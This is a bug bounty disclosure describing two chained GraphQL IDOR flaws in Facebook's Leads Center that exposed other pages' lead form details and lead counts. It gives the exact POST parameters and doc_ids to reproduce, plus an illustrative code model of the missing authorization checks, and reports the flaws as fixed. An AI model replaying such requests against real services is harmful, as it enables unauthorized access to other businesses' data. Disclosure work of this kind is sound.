Disclose leads form details of any Facebook Business Account or Facebook Page (Bug Bounty)

By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center, a malicious user could have exposed the leads form details of any Facebook Page or Facebook Business Account.

Impact:

Advertisers spend a lot of time, energy and money optimizing their leads campaigns and running countless A/B tests in order to find the right performing ad. By exposing the leads form details and the total number of leads captured through paid advertising, a malicious advertiser could have spied on a targeted Facebook Page or a competitor to "steal" and copy all the winning/profitable lead ads without investing a single dollar in advertising.

Description of Facebook Lead Ads

Steps to Reproduce:

1) First GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={"pageID":"X"}&doc_id=3388026827877743

Where X is the targeted Facebook Page ID.

The returned response will disclose the leads form details of the targeted Facebook Page.

2) Second GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following additional parameters in the request body:

&variables={"pageID":"X","start_time":null,"end_time":null,"reminder_start_time":1610481600,"reminder_end_time":1610568000,"stage_id":null,"owner_id":null,"form_id":"X","label_id":null,"name_search_term":null,"answer_search_term":null,"email_search_term":null,"notes_search_term":null,"phone_search_term":null,"adgroup_id":null,"campaign_id":null,"campaign_group_id":null,"pageSize":20,"expiring_type":null,"is_unread":false}&doc_id=3547538925278909

Where X is the Facebook Page ID and form_id is the targeted leads form ID leaked by the first GraphQL IDOR vulnerability.

The returned response will display the total number of leads captured through paid advertising by the targeted Facebook Page.
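As an added illustration (not Facebook's code, and not part of the original report), the following constructed in-memory model shows the two authorization checks whose absence turns both queries into IDORs: that the caller holds a role on the page named by pageID, and that form_id actually belongs to that page. Page, form and caller identifiers below are made up.

```javascript
// Added illustration (not Facebook's code): an in-memory model of the two
// Leads Center queries described above, with the missing authorization
// checks that would have prevented the IDORs. All data below is constructed.
const pages = {
  "111": { admins: new Set(["alice"]) },
  "222": { admins: new Set(["bob"]) },
};
const leadForms = {
  f1: { pageId: "111", name: "Spring promo" },
  f2: { pageId: "222", name: "Competitor form" },
};
const leads = [{ formId: "f1" }, { formId: "f1" }, { formId: "f2" }];

class ForbiddenError extends Error {}

// The caller must hold a role on the page before any page-scoped data is returned.
function assertPageRole(callerId, pageId) {
  const page = pages[pageId];
  if (!page || !page.admins.has(callerId)) {
    throw new ForbiddenError(`caller ${callerId} has no role on page ${pageId}`);
  }
}

// Vulnerable shape of the first query: the pageID argument alone selects the data,
// so any authenticated caller can read another page's forms.
function leadFormsVulnerable(callerId, pageId) {
  return Object.entries(leadForms)
    .filter(([, f]) => f.pageId === pageId)
    .map(([id, f]) => ({ id, name: f.name }));
}

// Fixed shape: authorize the caller against the page first.
function leadFormsFixed(callerId, pageId) {
  assertPageRole(callerId, pageId);
  return leadFormsVulnerable(callerId, pageId);
}

// Second query: besides the page role, the form must belong to the page named in
// the request; otherwise a form_id leaked from another page could be paired with
// a page the caller does control and the lead count would still be returned.
function leadCountFixed(callerId, pageId, formId) {
  assertPageRole(callerId, pageId);
  const form = leadForms[formId];
  if (!form || form.pageId !== pageId) {
    throw new ForbiddenError(`form ${formId} is not owned by page ${pageId}`);
  }
  return leads.filter((l) => l.formId === formId).length;
}
```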

Timeline

January 5, 2021: Report Sent
January 6, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
January 13, 2021: I added a new vulnerable GraphQL request to the report
January 15, 2021: Fixed by Facebook
January 15, 2021: I added another vulnerable GraphQL request to the report
January 21, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.
